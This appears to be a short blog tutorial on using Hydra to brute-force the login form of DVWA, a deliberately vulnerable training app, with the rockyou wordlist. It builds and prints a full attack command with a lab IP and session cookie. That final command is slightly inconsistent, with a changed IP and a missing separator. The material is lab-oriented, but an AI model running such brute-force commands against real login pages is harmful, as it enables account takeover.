Hydra as a password cracking tool benefits also for dictionary attacks. It performs on many protocols such as RDP, SSH, FTP and HTTP. In this article, we will walk through how to use Hydra to brute force HTTP GET login form, but the case is DVWA vulnmachine.
Here is the login page to be BruteForced.
There are two common ways to conduct brute force to the webpages: burp suite and hydra. The easy way is to use Intruder of BurpSuite, but it is not effective. I also came across a series of errors while using hydra as follows yet the given request is from BurpSuite which should be re-edited:
Since it is ordered with a right method depends on login form, it is easy to get the right credentials - if it exists in the given list :) -.
This is the list that can be followed combining the each pieces.
Username or user list -l -L
Password or password list -p -P
Http method (Post/Get)
IP address or hostname
Directory/Path to the Login Page
Request Body for Username/Password
Session cookie with H
A Way to Identify Failed Attempts
> specify a well-known username
-l admin
if the username is not clear, replace -l with -L providing a wordlist contains usernames.
> specify the password: we can use the common rockyou.txt which is already exist on Kali
- P /usr/share/wordlists/rockyou.txt
> specify the method, IP address to attack, and the path to the Login page
- http-get-form
- 192.168.28.140
- /dvwa/vulnerabilities/brute/
> find the username/password inputs within request body of the form
- username=^USER^&password=^PASS^&Login=Login
All are here, but have to be modified into Hydra command; e.g. replacing username with ^USER^ and password with ^PASS^ to make Hydra to try the words from our list in those positions.
> find the current session cookies
- H=Cookie:security=low; PHPSESSID=863ab4fe6ef3fa9588d31ce0e5f5a81c
> specify failed attempt
- Username and/or password incorrect
> now, it's time to execute the combined command
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://192.168.28.14 /dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^Login=Login:H=Cookie:security=low;PHPSESSID=863ab4fe6ef3fa9588d31ce0e5f5a81c:Username and/or password incorrect'
Comments